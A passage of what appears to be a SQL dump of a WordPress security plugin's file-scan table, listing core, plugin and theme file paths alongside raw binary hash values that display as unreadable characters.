m8','',0,'?'),('�&�M�X��W��O�','wp-includes/error-protection.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?5�p��.9�;F�ܧ�','֦ �7S�\Z�\\��cdLb|o�1��Y�ã��:','',0,'?'),('��EEtz����9Yg�-','wp-includes/wp-includes/js/tinymce/plugins/wpeditimage/plugin.js',0,'�j�<�]�@����	4�','�j�<�]�@����	4�','\r]\"��!�\'sg=�����zķQ��2�NK�','',0,'?'),('�\r��l�bt�:��','wp-includes/wp-includes/js/jquery/ui/effect-scale.js',0,',ʡ0��\\K4\'��t�',',ʡ0��\\K4\'��t�','Ұ�-yߎf+�)�R��q[t�QJ��Z ?','',0,'?'),('�S�򽟈b�eL��','wp-content/plugins/wp-cerber/assets/flags/be.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','YZx��ʭ��T�/� �','4�nMM��e)񤉓��<�Ia�P�1�K�~#`G','',0,'?'),('�\\p�+���a=a1:P�#','wp-content/plugins/wordfence/css/activity-report-widget.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J�^x;y�����c���','�ӡ��f�aM�Wv+�W�%}��`D�N��','',0,'?'),('�^�;�*\n�d�8H�ᵿ','wp-includes/wp-includes/sodium_compat/src/PHP52/SplFixedArray.php',0,'��ئT�Ь�Ԅc�/��','��ئT�Ь�Ԅc�/��','TJ�)�,8�q�@�f�<Dڛ��\rx����F�','',0,'?'),('�h�����FuQe� �','wp-includes/images/wlw/wp-comments.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L�6]P����.s���','�zl\Z��C��D���#�a�N��3\'XZ�','',0,'?'),('�~n�\n��b����[�#','wp-includes/wp-includes/images/crystal/audio.png',0,'�nV�:�ω�G��-#k','�nV�:�ω�G��-#k','�~B\Z-׼�of|W�x\\��|�M�)���ˢ','',0,'?'),('�u1HM:E7/�{�','wp-admin/includes/class-wp-site-health.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{�-I��:�����9�+','Y��z���W2|{}1и����^�iN�q�C�Y�','',0,'?'),('��ZԬ=!Ri=�7�h�','wp-includes/js/dist/vendor/wp-polyfill-object-fit.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���j	\r�<l�J�l�','[�a6$sp8����Y�Q�\'��1��\0�Dح','',0,'?'),('��Α��>=����]�','wp-includes/wp-includes/js/jquery/ui/effect.js',0,'�j�Bs*C���x�','�j�Bs*C���x�','|�Bh��z��+�{nց.n�s�E\\I��\0���','',0,'?'),('�ǀ3�<��&��YĆ','wp-includes/class-wp-roles.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��?T�v���|U�y','?}]�����b4\0����J�� ��5�.��1U','',0,'?'),('��.�IOI�P��%�)','wp-includes/Requests/Transport.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��;�k���K\\Vl�','ɯO3e���F��㛆��v+����.r/�>�,','',0,'?'),('��MO,���s���\r��','wp-includes/class-wp-http-encoding.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Usg2eޫj9�EA����','t��1��XZ��C�9��c��x](D[9��O�','',0,'?'),('�#ynہ彐[hr\\�U','wp-content/plugins/wordfence/modules/login-security/views/manage/activate.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��@����{�Թ6','�دh\Z�o�>���:즱�l� 5D�_�\'-�w','',0,'?'),('�6�|;�;8�Q�4�k��','wp-admin/install.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�^�&8�]=	����R','h�Q�4n��ńY�9��޿�-ǚ7F�&8���ܷ','',0,'?'),('�9�e�E��bݾl�3�','wp-includes/js/wp-lists.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��uP��*�L�[�C�','!��JL=�Tl̞_p@��ȟ���R��M��S[','',0,'?'),('�;@����g�sLyesC','wp-content/themes/sg-window/img/icons/buzz.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z&0�*Sj���Z����,','&�E�d���リ�G�ߎ:N��J�)�km��HBc','',0,'?'),('�R��x�ȱ�\Z��<^','wp-includes/wp-includes/js/dist/nux.js',0,'ꁥ�قH6K�&�x7��','ꁥ�قH6K�&�x7��','-p� C��5s����5��s\"�^�C�����8','',0,'?'),('�W��f�0�\n�D	�/\'','wp-content/plugins/wp-cerber/assets/flags/km.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%������&\'z���V',';��NS6����:����݇�u͙�r�x� ','',0,'?'),('�c�@�7T�ҙ����','wp-includes/wp-includes/Requests/Auth.php',0,'1��R��W��ÔO[��J','1��R��W��ÔO[��J','bO�Q�wù�LѠâ��������9Q��lrl','',0,'?'),('�z9�	�`�d3�\0�Iay','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/XChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','� �@��^����8J','��ؽ�@��B-K���m���-Ȼ��\Z�2p','',0,'?'),('���*r%Y�3/�hN�p','wp-content/plugins/wp-cerber/assets/flags/sb.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v�5J��䈒?Qo�<','����T�	k��w#�����Af�3A2�͂M','',0,'?'),('���$\rl^�+6YQ��','wp-content/themes/shootingstar/functions/headerdata.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��<��cWc�V��','o�X��p�l�	-��k����$A9�','',0,'?'),('�����O����m7��','wp-includes/wp-includes/images/crystal/license.txt',0,'�]�Lc�iG�fQ�\r��','�]�Lc�iG�fQ�\r��','v��pm��c�6�Y~\",!V��EXl�l�\"z�','',0,'?'),('����E�?��Юᾠ','wp-includes/js/media-views.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�J虝���\n�G{5�','�7�ϝ���P9n)%�-�i�Qԭv���kJ���','',0,'?'),('� �v����bu)','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_bytes_dev_urandom.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�G�r����]��/�','yus���Կ�����:�\0)�y�zs�ݿSkH�','',0,'?'),('���R:^�e+x2��c','wp-includes/PHPMailer/SMTP.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ӂ�\'�;R����<?','\n:P�(\ZAU�ٵ�< ���pe\0��W��o/b�','',0,'?'),('��Cg����}|�E��','wp-admin/js/word-count.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I)�\r�]�X0�h5�\n�','�\\DE����lV�����Hk��\\N�A3���','',0,'?'),('�	v�O.�|ߤҵ�','wp-includes/js/tinymce/license.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o�����x:�`����','Y��#wO�g^\'�b��:�^�	=跨|��','',0,'?'),('�!�M��TP��c� SO','wp-includes/wp-includes/images/uploader-icons.png',0,'��\\M�����m��','��\\M�����m��','�p����+/������i��!Z�ţ6�m�','',0,'?'),('�;9�49����**3���','wp-includes/wp-includes/widgets/class-wp-widget-recent-comments.php',0,'~���f%�(��xfn3','~���f%�(��xfn3','��0ſ���Y�~�YǦ�����m','',0,'?'),('�Lߨ�Ϥ�(��R�','wp-admin/css/code-editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��gq���i�s�픋-','�~:\"�`�he&@��*����A�����','',0,'?'),('�k�|DD��*@4�','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Database/Reader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\nAgv��1P�ص','����0o*\r��vA�o�3���:��j�u���y','',0,'?'),('��p��K�b��\0!�(��','wp-includes/css/dist/block-directory/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ˆ�gJ��^<','���\ZybF���v��J�}�z��Lj��	(','',0,'?'),('���`e�>�s�ਝ�','wp-includes/wp-includes/images/smilies/icon_arrow.gif',0,' 	�J<�g��o�9:x',' 	�J<�g��o�9:x','�n�c���x0�ĥ���t��N���޾Y2X\0!','',0,'?'),('��O�֕�N&�&���2','wp-includes/wp-includes/author-template.php',0,'©ei+`љ�[��>q','©ei+`љ�[��>q','kt0���6�;��^@�ê��R Β�6�9r߯','',0,'?'),('��hxh�M*����S�','wp-content/plugins/wp-cerber/assets/flags/bn.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��C.M��sg:��','s�@�Zd}���x���-r���^�x8Z.���','',0,'?'),('��|�~�������','wp-includes/sodium_compat/src/Core32/Salsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')6��):�������','H0��L�ї?�㞹�.1�M�Ie��٣�','',0,'?'),('��b�������|e~�','wp-admin/css/customize-widgets.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�x��]&?��I*1�e','�s������Wk�B��$oG��N��\n���','',0,'?'),('���al�V�?�f�\Zё�','wp-includes/IXR/class-IXR-server.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��d߹��$c�9�','\0�{M��U�\rN.�)���-����`wH���','',0,'?'),('�\0h�Kf��\0�','wp-content/plugins/wordfence/images/forward_enabled.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U\0/3e4e�����','0��Q7018�ު9-�z9ؽq��SrĒ�P��','',0,'?'),('�W;{�w_*#��=*','wp-includes/wp-includes/customize/class-wp-customize-nav-menu-item-control.php',0,'*:Uț�J>��h�z','*:Uț�J>��h�z','=��C����\0\"ȗ�gp�{��K�ϮD�\'�','',0,'?'),('����Ž��H�06�','wp-admin/images/browser.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���ž�K\\�b�$�F','&$�ĉ9����~_SH�_�̓�%L���\'&�','',0,'?'),('����8(\Z�j�Z]}','wp-includes/js/jquery/ui/effect-pulsate.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4\0�q2�l����d','ȩ~��0M���0\"���7	]1�sP�J�T','',0,'?'),('�X�R�ev�� O��U','wp-includes/blocks/quote/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N`�^/��(��ǝ2�=','/{��Oe;gt@aݸG	�/1Sv>��e̢kE','',0,'?'),('�X����g5��(�=c','wp-includes/js/tinymce/skins/lightgray/img/trans.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��7I �1F�Gu�j^','�� �û���ͥJ��O�mO�:ϙ���l�W�5','',0,'?'),('�pt_ Y����7L�Kt','wp-admin/css/deprecated-media-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���uְ�Z�l�\"�','�����K��ṥ�=���$�ϻ���]�C�i','',0,'?'),('����T��D��F�K1�','wp-admin/css/media.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��9��V80*�','\0-��ZGhV¥�\'�U\\ �����%d�','',0,'?'),('��˳�}��N�3+Mg','wp-content/plugins/wordfence/js/jquery.tools.min.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�:-��Eՠx�$�B',',�4�~aT�lS �fQO	f���Tӵ��;��)','',0,'?'),('��/GΞӶ[�ǜ��C','wp-admin/js/gallery.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��kt���q	�x','��7`YՓ<���9Y�i�l�۪�Kȯ��','',0,'?'),('���[�/�9}�`:w�P','license.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Z��{�\0S�g��D���','��ы��I<�m�db�}��̑x��V�5/����','',0,'?'),('�ܩ_\n4�.���j','wp-content/themes/sg-window/genericons/genericons/genericons.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�%�R�����}YM(','��;�Ji2�4�{3��.��(^�Z}řۉ*E','',0,'?'),('���7�%�̬���&�','wp-includes/css/dist/block-library/common.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��XBI���mC�','Q�E��e��\r��_�1�Pj���W�r�','',0,'?'),('��Z%7��������','wp-includes/wp-includes/js/dist/date.min.js',0,';�̆H;M�6ɻj�',';�̆H;M�6ɻj�','w��y��D���~�`,�SM�\0�4+�MA','',0,'?'),('�\0�����.}�fwA','wp-includes/date.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n[*(Ҿ�w.m�y�z�','�.��\0�qB_]������\0��a�}��\0�','',0,'?'),('�^��;X�)ڤ6)','wp-content/themes/sg-window/img/icons/google.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�o�c�h�R#?��9-','[�ayǟ(�,@z�5��z���Abr�t�̣�G�y','',0,'?'),('�$�[gJ��ϭ���Gx','wp-content/themes/sg-window/img/icons/small/ask.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r�_�3\0��!�g>/�e','϶�ml�Xd�~E�Z<�Z�0�\r��G�cwil','',0,'?'),('�,p|醫�s��T?t&�','wp-includes/wp-includes/class-oembed.php',0,'j,;�\Z3�x���','j,;�\Z3�x���','��0�v�!�vv7�H�lV�d���i\'K�����','',0,'?'),('�.���FC�p���3��','wp-content/plugins/wordfence/js/wfdropdown.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����rp��c\'\Z�','��SG��s8;�Z�!�זJ�u�1�z?���','',0,'?'),('�J��S�h+.|�','wp-includes/wp-includes/js/tinymce/plugins/image/plugin.min.js',0,'-��ZC�l­}�莐�','-��ZC�l­}�莐�','y��T��Nz+����⃆��\'��%Y�','',0,'?'),('�N\n�i�{Z΂���J*','wp-includes/wp-includes/js/customize-models.js',0,'�\'�~G~�Ԟ�','�\'�~G~�Ԟ�','�h�3XVx�p��T��OS‘Sfb��\r�E捵�','',0,'?'),('�[���QH\"pS1Ȫ�c','wp-admin/images/arrows-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','� Q�}��ydb#6�','�,c�˿\Z�i(~���)����\'��8[A�/�I��x','',0,'?'),('�kLǤe���(�ȸK','wp-content/plugins/wp-cerber/assets/flags/ch.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�C�k�g�iT���I�ކ','R���:�=b���U|O@��R�˂}��-','',0,'?'),('��^r ��_y)�\'w�]','wp-includes/wp-includes/js/jquery/ui/progressbar.js',0,'N��=i�D��_zy�\r3','N��=i�D��_zy�\r3','��_n�����)S����6�3+n�3���','',0,'?'),('��EV�-�,̛�3��`','wp-includes/wp-includes/customize/class-wp-customize-themes-panel.php',0,'�uZ���7ѳ����U','�uZ���7ѳ����U','aMk��M.�ݚ�fJ>����{�V���>v2U','',0,'?'),('��[ixT�q��~Wv�e','wp-admin/network/plugin-editor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x�JY��Fq�^��N�','z��w�iL�_�*�	!$c��L*�T�qDN_','',0,'?'),('��F~���y�c7v-','wp-includes/js/customize-preview-nav-menus.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k�m�	i13-����','��%N�q�4��6�\n$^o����Ĝ7k��.�','',0,'?'),('��޸��Ѥ;D���','wp-content/plugins/wp-cerber/assets/flags/jp.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����Jn@��Aל^�','��7���^qU���` ��	�}wͧ�h��','',0,'?'),('�䑖�w�7:\'�h*','wp-includes/js/dist/vendor/lodash.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2n�B2���]�� �','\"��Qe��\\NJhb�Bj�{i�J\n�Қi;eZ�3','',0,'?'),('�����s�%+1�;','wp-includes/wp-includes/Requests/Exception/HTTP/418.php',0,'J!�����[��4��','J!�����[��4��','4 �6鎬��M&�$!�2d<��\\	|\\�?g�\n','',0,'?'),('��z�^%���+[$��i�','wp-includes/wp-includes/Text/Diff.php',0,'\r� \ZV���:��','\r� \ZV���:��','�N\'�u�p���=Z�\"-��K����r','',0,'?'),('������]��+St�','wp-content/themes/sg-window/content-jetpack-portfolio-archive.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�hN��	���{��1ӌk','�\Z��1M�����td=.5��o��Y,\")j���','',0,'?'),('���2���:�����','wp-includes/sodium_compat/namespaced/Core/Xsalsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�b4�\'��&��','ۼ�4P\'���hN�a�>���E�5ఛ','',0,'?'),('�\Z-��x7�(A�4���','wp-includes/js/swfupload/license.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��[�`�^�-�o�QWz','��:)��6�a\"3r��\rP\rN�4�yJ�ַ��U�q','',0,'?'),('�1W;c�����N�\"�u','wp-includes/pomo/streams.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����p�5yN.��&','�Ό��!-�ʉ�^;�#��Ut�\n�W^���YG5','',0,'?'),('�5$���p�#�e','wp-includes/wp-includes/images/smilies/icon_razz.gif',0,'9[�w���D�AM�A�','9[�w���D�AM�A�',';���P�1]f�UE��;`Qڮ�\ne�Z\0@4�aA�','',0,'?'),('�Eޝ�Q�x.�wN��','wp-content/themes/sg-window/content-none.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','eQ3��.S��M�<;','E*�o�)���,=v˓COJV_��D���](��)','',0,'?'),('�J��B�GT�;,l��T','wp-includes/images/smilies/icon_exclaim.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':\\��>5�\0r���sg�','�L�ɵ�H��A(�xʓ2�EP%�	��#���#�5','',0,'?'),('�O�-DK��tkE�j','wp-includes/wp-includes/embed.php',0,'V\Z���/}ͳYM=��','V\Z���/}ͳYM=��','6K�(|�/�R��̵�;$.�Jf8{�v�G�','',0,'?'),('�V�^�3��m6�._P','wp-includes/customize/class-wp-customize-background-image-setting.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')�@�t��j23��W','�4���0^+�u*�:ޓ4q[#��O��m�&�','',0,'?'),('�_r p�L�Ʒ��ʼn�','wp-includes/wp-includes/ID3/module.tag.apetag.php',0,'�\\)���H�G���>�','�\\)���H�G���>�','ٚ+��\"�Bt���	\'S_��̄E�s��_�)^�','',0,'?'),('��i���Z/&�J8|�','wp-includes/wp-includes/js/dist/token-list.js',0,'�r�o��\Z�����#','�r�o��\Z�����#','r�����a����D����*�Q�R��4A�','',0,'?'),('���Y`���FΘ�,�','wp-includes/wp-includes/template-loader.php',0,'�z�	ҿ��܌~���','�z�	ҿ��܌~���','��\'4�h �䱺��[����E��%��J�H�','',0,'?'),('�����[���D?_�[�','wp-includes/random_compat/random_bytes_libsodium.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4������Տ��d�','�I�n��6��_����ga8��y��].��','',0,'?'),('���7�M3š�$��','wp-includes/images/smilies/icon_question.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��[-\0�\'��W��F','�7b��|6#����9/?x��~��[��%t','',0,'?'),('����2@�k�w>K�2','wp-includes/feed-atom.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{\r�g�\'SkI�fe�p�','!�I��m\nY��f+̕�P\0����13�\\=��','',0,'?'),('����H\0ۙ��h�C��','wp-admin/css/colors/ectoplasm/colors.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'�؄D���9�j�K\\','~�2��H�3��.�4�\"���Fo�W��^܉','',0,'?'),('��wt�H���-s�\0�n','wp-includes/js/wplink.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�7\"U��\"�?���','S\\��	���ٺ�\'?��I��75�{','',0,'?'),('��]����1w㞜','wp-content/themes/sg-window/genericons/README.md',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[���鬓�/ؽ�&��','nq$�4�?9�Y|z��8!F��E���<�m>','',0,'?'),('���=֬H�@-i��','wp-includes/css/admin-bar-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����r���ju',',t�c*	2�����3ئI����4�j','',0,'?'),('�֔��ߚy(qD�w�','wp-content/plugins/wordfence/models/common/wfGeoIP2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�YJs@j���r�jtm','�3ÑѲs��\r&�z=���ds��pJx�3�w','',0,'?'),('��\'�T[K�u��U','wp-includes/wp-includes/class-requests.php',0,'X@�?i� Xc����','X@�?i� Xc����','���$��\r7�U���M����]���g6‡�>C','',0,'?'),('��h�L���JH�X#0','wp-content/plugins/wordfence/lib/wfUnlockMsg.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J�c)��Re�Y�l�7��','.�`�i�W�	t1�}�sty�ɪ���!K','',0,'?'),('��h�_��-�\rus{t�','wp-content/plugins/wp-cerber/assets/flags/bd.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�_R�jQ�k.��4','k�j8�F��/���)�5��aC�,�12O�H\'','',0,'?'),('���^��\'�q���0��','wp-links-opml.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���ln��j�\\w�X=7I','7���\"1j��L?9Y�\"��&���kŌVD�|��','',0,'?'),('�\"\\NR^���=��H�','wp-includes/wp-includes/category.php',0,'�`��k�3wh��k�͔','�`��k�3wh��k�͔','G�>�F|59��~�q|\n&\0��R	l�','',0,'?'),('�%n��Tߒ	^�gXΰ','wp-admin/js/inline-edit-post.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ub��:\\22B�E�C��','C��{�/I~�޸�\Z\"\"e�UT��B���ވg','',0,'?'),('�3��aD�w�P����q','wp-admin/includes/class-theme-upgrader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ڪ&��텾��U�7y','��-R��RlG���cR�K��������a:���*>','',0,'?'),('�}\n�`B{0-�L5�m','wp-includes/wp-includes/js/jquery/ui/effect-puff.min.js',0,'�^��5�����t�','�^��5�����t�','`}��`�J)�$;��+�6K�C1R�&]C�i��','',0,'?'),('���E��c�+,����P','wp-includes/wp-includes/js/tinymce/plugins/paste/plugin.js',0,'�^���s׶�{��މ2','�^���s׶�{��މ2','�\Z�X8�c+�x�η����&Wg�`m�˴','',0,'?'),('��n&���n�!崬�','wp-admin/css/site-icon.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l�ˁx�J��TG���','�+���W���V��3�(qF���r;�|^�@��','',0,'?'),('���\\�k���\r�xC�O','wp-includes/wp-includes/blocks/archives/block.json',0,'u�P*�5�\\�d\"Sn�','u�P*�5�\\�d\"Sn�','�/qkU����5i�#��-�̄aye�d̹�B:','',0,'?'),('��&��-w���.˚��','wp-includes/wp-includes/css/dist/block-editor/style-rtl.css',0,'�뺆��	�#��y�k~','�뺆��	�#��y�k~','(���䚆�u$/�/��f��Ш�۬x��M','',0,'?'),('����EX���|T��','wp-includes/blocks/media-text/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M�0�y���~_>2�','ɗU�(���S�t��R��QYq�ex}I\'��P','',0,'?'),('��	�k-9eMԡR','wp-includes/wp-includes/sodium_compat/src/Core32/Int32.php',0,'��3��NM[�/�\r~H','��3��NM[�/�\r~H','�����r�W���Q@x[1� ���*o�9�$�','',0,'?'),('��]j�l�\'��/x5','wp-includes/js/wp-sanitize.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���:k���E�t6Q��','yΦV�� }ɛq����K>ۈP6��*��C\ns}','',0,'?'),('���W��{�\\,�Yu�','wp-includes/js/jquery/ui/effect-explode.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��0���i!1��	�','s��e=\'���ڜ�N�I�{�U�!�M�E�s','',0,'?'),('��71���}\n��','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/ChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1�2+;�F���нNM��','�w��\"�*��5�U T@��nyȳ�^a�u��\'','',0,'?'),('�2X69G3�\Z�+}A�6','wp-content/plugins/wordfence/views/waf/option-whitelist.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�@7���#{X��q��','J���n�������Pq��/�\Z�n\n��l�V','',0,'?'),('�5����\r��k��','wp-admin/js/color-picker.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����zhg\0~���','=k�jY�8�8r�a���hI�:Rի9��i��É','',0,'?'),('�8�������P5aĨ�	','wp-includes/images/smilies/icon_wink.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e?2���i����','�(���V��{�V�Bk����o(`Z��V	6','',0,'?'),('�B�h\Z����n.]=','wp-includes/wp-includes/js/wp-custom-header.min.js',0,'KO��x �3��y;9�','KO��x �3��y;9�','��X$A���\r\"N��e�$ߦ��+���L(','',0,'?'),('�ma\Z�9�+~�ȍ��q','wp-includes/wp-includes/random_compat/random.php',0,'�5&}k���!6�$�','�5&}k���!6�$�','X8�P���_9���kQ�a[��-mS\'<�@�!V:','',0,'?'),('�����y85���æb�','wp-admin/css/colors/sunrise/colors.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��z��t��b傽�','�]�\0�mXٕ���Ç?���L�d�rHyʧ','',0,'?'),('����H	|(#`�S5sAi','wp-content/themes/sg-window/genericons/genericons/Genericons.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/�=³zeX*�|��b','Ä@��Pw*\'�0M�\'D�۝c�1��ח�d��','',0,'?'),('��l�3.	XN�','wp-includes/Requests/Exception/HTTP/403.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��`�\r�o��k3��1�','�I�l�E�K�Ѧ��?Z�0JT�����U�','',0,'?'),('��\"~I��E�\rD�@','wp-includes/wp-includes/js/plupload/plupload.js',0,'ݠ�$pZR�>\'�|�','ݠ�$pZR�>\'�|�','�\"����8[J%�.�˚�c�V\r\rE��)\'','',0,'?'),('��{�1u�.b}κ0$�','wp-content/plugins/wp-cerber/assets/flags/bi.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',|��\\_��27�k��	','v����JȢ�\"DWK�9q	�Q�^F%a�A','',0,'?'),('���$��>P���3�V�','wp-includes/wp-includes/js/dist/a11y.min.js',0,'婯�S\Z�`�!`TLu','婯�S\Z�`�!`TLu','ʢ����Α%��d5F�(�VW��1�V|\"u99','',0,'?'),('����PQ�E|E}7+','wp-admin/includes/class-wp-filesystem-ftpsockets.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z�/CO\Z>yCiϼ�2�','�9�{��pZ�I�͖��w[Y��.2�l�7�౵�','',0,'?'),('��U���$�\\*�1^�S�','wp-includes/js/jquery/ui/effect-clip.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�G��=�����:�	s','��tw�:��o,�u3Mxm���x�H ��gC��','',0,'?'),('������ە��v�)�','wp-includes/wp-includes/js/dist/components.min.js',0,'�)��[Ŕ��^�2��','�)��[Ŕ��^�2��','��v�,�$.����b��߲���^�#n1�c�,','',0,'?'),('����P�J�t��1z','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_bytes_libsodium.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��wU ��ې6M�\\�8','<����\0�\rIB=\"�P8D�\"�����L~�I[','',0,'?'),('����_�� �\0*�O','wp-includes/rest-api/endpoints/class-wp-rest-site-health-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�u��u��tu�+]�a','�\n�1�IJ��A��P3����C\0{K7QO��f�','',0,'?'),('��P\Z��/���l%�','wp-includes/js/jquery/jquery.hotkeys.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j��hI�QLZA$Un�H�','��T����f�RMS�9º��MDR��R��N�','',0,'?'),('�\0� ��k~��U5T','wp-includes/widgets/class-wp-widget-text.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��;���\r9!�5�P�','Y����7%��Z�Gݠ\Z��ӊr�cI�ϸ','',0,'?'),('��i�L�ƾ�<k��','wp-includes/wp-includes/images/smilies/rolleyes.png',0,' ���O�2�Ofݣi�',' ���O�2�Ofݣi�','fK�)�\n�d��!]\r)��\\}���זl�^��','',0,'?'),('�	J.�\'��Vn{�|�T�','wp-content/plugins/wp-cerber/assets/bgwidget.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','PM6ev����3���','��F.�F��3��r5�e�*\rl��������3\r','',0,'?'),('�\n%f[!aE�r�tg�i','wp-includes/images/media/video.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����u�h����q��','DBU����MiO�b�,���e��=��W�{���','',0,'?'),('�&�S짿o�$�0�n','wp-includes/author-template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','©ei+`љ�[��>q','kt0���6�;��^@�ê��R Β�6�9r߯','',0,'?'),('�A%��s8��a��ڣ��','wp-includes/wp-includes/js/comment-reply.js',0,'�F���D6����x�','�F���D6����x�','!�x��G�����Go�Df�B8xXC�','',0,'?'),('�E�ܦ	